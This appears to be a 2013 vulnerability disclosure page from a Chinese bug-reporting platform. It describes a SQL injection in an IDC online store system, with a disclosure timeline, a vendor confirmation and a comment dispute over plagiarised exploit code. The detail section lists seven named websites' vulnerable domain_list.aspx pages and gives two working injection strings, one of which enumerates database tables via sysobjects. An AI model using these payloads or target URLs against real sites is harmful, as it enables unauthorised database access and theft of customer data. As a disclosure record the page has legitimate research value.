漏洞概要
关注数(24)
关注此漏洞
漏洞标题:某IDC网络商城系统存在0day SQL注入漏洞,影响国内大部分IDC在线商城
提交时间:2013-02-12 14:57
修复时间:2013-03-29 14:57
公开时间:2013-03-29 14:57
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
无
漏洞详情
披露状态:
2013-02-12: 细节已通知厂商并且等待厂商处理中
2013-02-17: 厂商已经确认,细节仅向厂商公开
2013-02-27: 细节向核心白帽子及相关领域专家公开
2013-03-09: 细节向普通白帽子公开
2013-03-19: 细节向实习白帽子公开
2013-03-29: 细节向公众公开
简要描述:
某IDC网络商城系统存在0day SQL注入漏洞,影响国内大部分IDC在线商城
详细说明:
首先说明,本文中exp代码是利用了@姿势不行基友的 之前没有说 对不起了 算是抄袭了
http://www.101000.cn/user/domain_list.aspx IDC网站火速网络
http://www.gzcmweb.com/user/domain_list.aspx IDC辰米网络
http://idc.beixue.cn/user/domain_list.aspx 惠州IDC服务网络
http://www.68ws.net/user/domain_list.aspx IDC网畅网络
http://www.xinleikeji.net/user/domain_list.aspx IDC鑫磊科技
http://www.178848.net/user/domain_list.aspx 宁波IDC海曙翼企动力网络科技有限公司
http://host.siruo.net.cn/user/domain_list.aspx IDC昆明市思若科技有限公司
输入 %') and user >0 and ('%'='
然后输入
%') and (select top 1 name from sysobjects where xtype='u')>0 and ('%'='
看图
虽然可以进行手工 但是CURL写一个简单的中转工具
这样比较简单,你们看
求礼物,求礼物,大过年的是把。再说了,客户的数据你们看有份量,吗????
漏洞证明:
修复方案:
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2013-02-17 08:27
厂商回复:
截至17日,CNVD仍在复现过程中,尝试进一步测试。先行根据图片确认,待后续有进一步的结果后再补充反馈情况。
rank 12
最新状态:
暂无
漏洞评价:
评论
-
2013-02-12 15:07 |
溪水流淌 ( 路人 | Rank:9 漏洞数:2 | 如果一切都任我欲为,我会有迷失在这自由深...)
-
2013-02-12 17:05 |
x1aoh4i ( 普通白帽子 | Rank:403 漏洞数:62 )
顺便说一句,有一个总公司我在联系了,我和他们公司一技术猿关系不错,@剑心,我不是想刷RANK的 我表示深深地悲痛
-
2013-02-12 21:15 |
姿势不行 ( 路人 | Rank:22 漏洞数:7 | 我是爱卖萌的小阿狸呀http://www.qinqinyo....)
-
2013-02-12 21:47 |
溪水流淌 ( 路人 | Rank:9 漏洞数:2 | 如果一切都任我欲为,我会有迷失在这自由深...)
@姿势不行 还不知道是不是一样的,坐等公开吧。法克那个其实也算落后了,wooyun最开始还有。。。
-
2013-02-12 21:49 |
姿势不行 ( 路人 | Rank:22 漏洞数:7 | 我是爱卖萌的小阿狸呀http://www.qinqinyo....)
@溪水流淌 可是那个是我自己废了心思挖的,还自己编写利用代码,三天后这里就有了。。。郁闷
-
2013-02-12 21:52 |
x1aoh4i ( 普通白帽子 | Rank:403 漏洞数:62 )
@姿势不行 应该是一样的 都是这个 又不是什么秘密 我只是提交下而已 并且我一直在跟厂商协商,
-
2013-02-12 21:53 |
狸先生 ( 路人 | Rank:0 漏洞数:1 | It's a fool)
-
2013-02-12 21:54 |
x1aoh4i ( 普通白帽子 | Rank:403 漏洞数:62 )
@姿势不行 我会告诉你是不一样的嘛 这只是个0day 我把所有的站点都给列出来了而已 这有错吗
-
2013-02-12 21:58 |
x1aoh4i ( 普通白帽子 | Rank:403 漏洞数:62 )
@姿势不行 如过一样实属抱歉,可以说我受了你的启发,或者直接说我拿你的东西来的 这个说法比较好把??
-
2013-02-12 22:11 |
姿势不行 ( 路人 | Rank:22 漏洞数:7 | 我是爱卖萌的小阿狸呀http://www.qinqinyo....)
@x1aoh4i 你只要告诉我是那里面的与否就对了。。漏洞是否来自于那里。
-
2013-02-12 22:25 |
Panni_007 ( 路人 | Rank:17 漏洞数:10 | 专注于信息安全领域 http://www.panni00...)
-
2013-02-12 22:30 |
x1aoh4i ( 普通白帽子 | Rank:403 漏洞数:62 )
@姿势不行 漏洞是那个管理的地方 似乎是一样的 但是我不是抄袭 我没有抄袭 没有就没有 我只是想把我所在那个IDC给发出来 但是我没想到是这种结果 你要认为是那就是 随便骂 我问心无愧就好了 退出法克也好 怎么样也好 但是还是那句话 注入点不是抄袭你的
-
2013-02-12 23:09 |
x1aoh4i ( 普通白帽子 | Rank:403 漏洞数:62 )
这个洞 我利用了@姿势不行的exp代码 所以发出来了 对不起了 算是抄袭了吧
-
2013-02-12 23:19 |
Jewer ( 路人 | Rank:6 漏洞数:1 | 我很苦逼。)
-
2013-02-13 01:25 |
0x0F ( 普通白帽子 | Rank:231 漏洞数:60 | 尖刀安全 (JDSec.Com).......................)
-
2013-02-13 01:54 |
空城 ( 实习白帽子 | Rank:94 漏洞数:11 | 这个人很懒,什么也没有留下)
-
2013-02-13 09:21 |
园长 ( 普通白帽子 | Rank:134 漏洞数:14 | 你在身边就是缘,缘分写在数据库里面。)
-
2013-02-13 13:18 |
0x7c ( 路人 | Rank:4 漏洞数:4 | 我的0day用完了)
-
2013-02-13 18:27 |
0x0F ( 普通白帽子 | Rank:231 漏洞数:60 | 尖刀安全 (JDSec.Com).......................)
实习白帽子都是黑客,核心白帽子都是大牛,只有普通白帽子默默地看。。
-
2013-02-13 23:03 |
0x7c ( 路人 | Rank:4 漏洞数:4 | 我的0day用完了)
-
2013-02-14 00:02 |
whirlwind ( 实习白帽子 | Rank:34 漏洞数:8 | 极光肖风)
-
2013-02-14 13:40 |
Csser ( 路人 | Rank:11 漏洞数:6 )
-
2013-02-14 17:02 |
x1aoh4i ( 普通白帽子 | Rank:403 漏洞数:62 )
希望大家顺便关注下那个最新发布的一个IDC,也是这个IDC的另一个页面SQL注入
-
2013-02-14 20:24 |
Jewer ( 路人 | Rank:6 漏洞数:1 | 我很苦逼。)
